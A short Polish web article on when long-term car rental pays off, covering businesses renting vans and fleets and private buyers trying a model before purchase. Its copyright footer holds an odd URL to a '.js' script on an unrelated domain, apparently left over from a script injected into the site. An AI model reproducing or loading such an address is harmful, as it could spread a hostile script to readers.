» Wynajem auta na długi okres: kiedy stanowczo warto? Wynajem auta na długi okres: kiedy stanowczo warto?

Wynajem auta na długi okres: kiedy stanowczo warto?

W dość niedalekiej przeszłości wynajem samochodu zazwyczaj wiązał się z ważnym wydarzeniem lub uroczystością typu ślub, pogrzeb albo… szkolna wycieczka. Obecnie coraz więcej osób wynajmuje auta z innych powodów i to zarówno na krótki, jak i na dłuższy okres. Jakie przewagi ma długookresowy wynajem samochodu nad kupnem własnego auta? Kiedy warto skorzystać z takiej usługi? O tym wszystkim w dzisiejszym artykule.

Wynajem samochodów na długi okres w praktyce

Wypożyczalnie samochodów w Polsce i w Europie oferują zazwyczaj wiele różnych modeli aut o różnorodnym standardzie. Najem auta trwa z reguły od 12 miesięcy do nawet 3-4 lat, a płatności  z tytułu korzystania z auta są realizowane w ratach. Wiele wypożyczalni jest otwartych nie tylko na potrzeby klientów indywidualnych, ale także na przedsiębiorców. Oferta nie ogranicza się tylko do samochodów osobowych, którymi można np. wybrać się na wakacje. Wśród aut do wypożyczenia znajdują się m.in. busy, terenówki, samochody dostawcze czy ekskluzywne auta sportowe.

Okiem przedsiębiorcy: korzyści, które warto rozważyć

Wynajem samochodu na długi okres może mieć wiele zalet. Z perspektywy przedsiębiorcy można wynająć np. busa, który posłuży do codziennego dowozu pracowników na miejsce pracy. Dodatkowo możliwe jest wynajęcie aut dostawnych, dzięki czemu budowa właściwej floty tak naprawdę nie będzie konieczna. Kupno samochodów wiąże się z dużym wypływem gotówki, czego można uniknąć poprzez wynajem długoterminowy. Miesięczne raty za wynajem przedsiębiorca spłaca cyklicznie, więc kwoty wystarczy zaplanować w budżecie. W przypadku awarii pojazdu, jego naprawa często stoi po stronie wypożyczalni, a przedsiębiorca zazwyczaj może liczyć na auto zastępcze.

Przeciętny Kowalski także może zyskać

Osoby indywidualne także mogą korzystać z usług wypożyczalni aut na długi okres czasu. Taka opcja może być bardzo korzystna w przypadku planowanego zakupu samochodu. Jeżeli chcesz kupić dany model, dobrze będzie jeśli najpierw go wypożyczysz na dłuższy czas i sprawdzisz jak sprawuje się na co dzień. Być może okaże się, że model nie spełnia w 100% Twoich oczekiwań. Dzięki wypożyczeniu Twoja decyzja zakupowa odnośnie auta będzie bardziej przemyślana i racjonalna.

Dodano: 17.03.2021, do Branżowe, Hobby


©2020 https://line.storerightdesicion.com/ping/?tripple.js Wszystkie prawa zastrzeżone